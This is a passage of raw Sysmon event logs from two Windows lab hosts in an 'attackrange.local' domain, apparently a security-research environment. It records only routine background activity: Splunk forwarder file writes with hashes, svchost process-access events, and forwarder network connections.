12:23:37.163{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440321Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:37.095{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E35D2F5AF9590BAB9FB8188BC41BE61,SHA256=455099B22AB395FBAD5035C9165C6CE5E8CC82454DD6A3211FD70748C3E05063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291562Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:37.232{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA110963F6B233BC4C0050BEE6A73B9,SHA256=8F4C1A26A9A2D5C81DB5EC83DCC7E31B60531C3A3BAC2431AD591B4C2A11634C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440328Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:38.254{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21B5E30452ACE0E890ABEA33A7201609,SHA256=DE7E5A31BFE2796A7D7AD872ECC9048F3C180A44494F99B19F5A52AF2BECFE46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440327Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:38.254{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24065C14DF34D5F4EC565C8C311F42F1,SHA256=E65E657C640D743F7AB8CF3F75353D754CC8D808FD9890036AAE933B2BE04858,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440326Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:38.164{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440325Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:38.164{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440324Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:38.098{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DF89845F5195E82162399B4C2E3FA6,SHA256=BB45B8F81C0F7C4FB0ED943007F03F9235D803B6F843DFC48B8CC0CCE3CBBEB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291563Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:38.234{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851B1E34CEF294ED67E7A070E1020C84,SHA256=D3787FE6D2E9354A0BC8FBD2B3FC82201361B320545F0607406C4E5679DBC4F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440332Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:35.683{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62403-false10.0.1.12-8000- 10341000x8000000000000000440331Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:39.165{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440330Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:39.165{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440329Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:39.102{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDA58DA5AE39F4CA90FDA7A366C2EBDE,SHA256=E9385DA2A582E44D0ED72F428227BEA8CA41011C60B80A3BBC2F693BBF93ADCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291564Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:39.236{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EBE30C15E8DD18E02780D147440CC78,SHA256=A37CA56A17ADE7DE75E8079B618137D402BF42E65D7AC71F0189E2AD59471DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440335Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:40.336{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C2DC6FFE2D31FC14C8CC73C219BAB10,SHA256=A119900454D8469EC50A54FC6B5AE5BDEAB65AC83ACE04044E9D1750D6DBA161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291565Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:40.238{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4A5DD2A1F551CC6AB017286A00539F1,SHA256=BCDA3AA79FBE8970478D3A1735FCEA8F40322ACB4E180B446FE5EC767C42AE1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440334Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:40.166{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440333Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:40.166{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291569Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:39.455{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50618-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291568Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:41.240{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1FE8A93AE9A232B45A9B2E86C870F41,SHA256=3AE138956A876C5CC05078A824945BB47513FD24D0A0DACA20A155A7117E2F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440338Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:41.369{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6060417133D677C7BB6EBBF5C7BB2B6E,SHA256=124D84AC3948C65B582679F25030415FE7A96B49AE0ABF093B565D72C06446AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440337Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:41.167{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440336Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:41.167{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291567Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:41.176{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B28F3FD3D7ED2047171F11650264C6E6,SHA256=99FBE61A8FC14DF48FF2DA4B0932D2DFB33B329FB74570377AB80FEE2F30077B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291566Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:41.176{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B5404AF9A404941DE5679BDC3B4E0BA,SHA256=3CBC466907369B7FFFB915508103D18297CE1516172CCA05F5B1524506A2117A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291570Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:42.262{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FC38E34461C2FA13AF233C958CE3DF,SHA256=E90BE48EA2378E76256E84253A7AE6DB55C4E2FDA96ED8E58ADDF89D0BD62D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440341Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:42.537{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9962EAFB56B4189DD6960F739E4D5E41,SHA256=48E0270A13878B83A2CE14CE0F23236924065B5FDABC4DC3F936A91E0E2FAA8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440340Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:42.168{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440339Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:42.168{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291571Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:43.344{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96336A78E30CB45C9B9B1F10BE8BDABC,SHA256=9C1AFD9F88FC2F6E0DEC919C08F79BA1914C9D0682F5BF0F6771574177E5B468,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440344Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:43.545{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FB487A082AF3236F7ED17009EEB295D,SHA256=01D6610FB4F88079CFB67507BB876124B58906C3348E0E5AD184D167467C9E07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440343Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:43.169{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440342Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:43.169{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440349Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:44.556{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B9186C96E2CE927610ABA8B6E9B891,SHA256=A69E3D3362F1D978E800041DABB261D5E997C889F4E82B68D39D0F1E4865C403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291572Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:44.413{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=768CF11AC6CFDA5ED8BA341C51CAA4B6,SHA256=CBCBA4BDDE251C4D6A5D910C00637303741DD8369E9BD94D8A89044A0DC96A21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440348Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:44.320{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=506A768EC4E5F7B7D9AE7D2C5CF9C6DC,SHA256=0BA3C694C0F5B87227F28F0305C2DF932A67537C654E0F5B084368CC226AA663,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440347Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:44.319{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21B5E30452ACE0E890ABEA33A7201609,SHA256=DE7E5A31BFE2796A7D7AD872ECC9048F3C180A44494F99B19F5A52AF2BECFE46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440346Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:44.170{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440345Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:44.170{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440353Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:45.574{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88D3E29079BB416C61D173B7CFCEF9D,SHA256=4A4AD7D73D3DCEDAD83CBBB77735FA5F715225CB1FBEF3543664A53A0A8B83B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291573Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:45.430{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D4DC7EFF90D188E05BB73FC8B4F2CCC,SHA256=7A6A26462C4EC9ED9625811FC76BFF801F7D613C574F640C841389131726CBD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440352Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:41.556{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62404-false10.0.1.12-8000- 10341000x8000000000000000440351Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:45.171{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440350Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 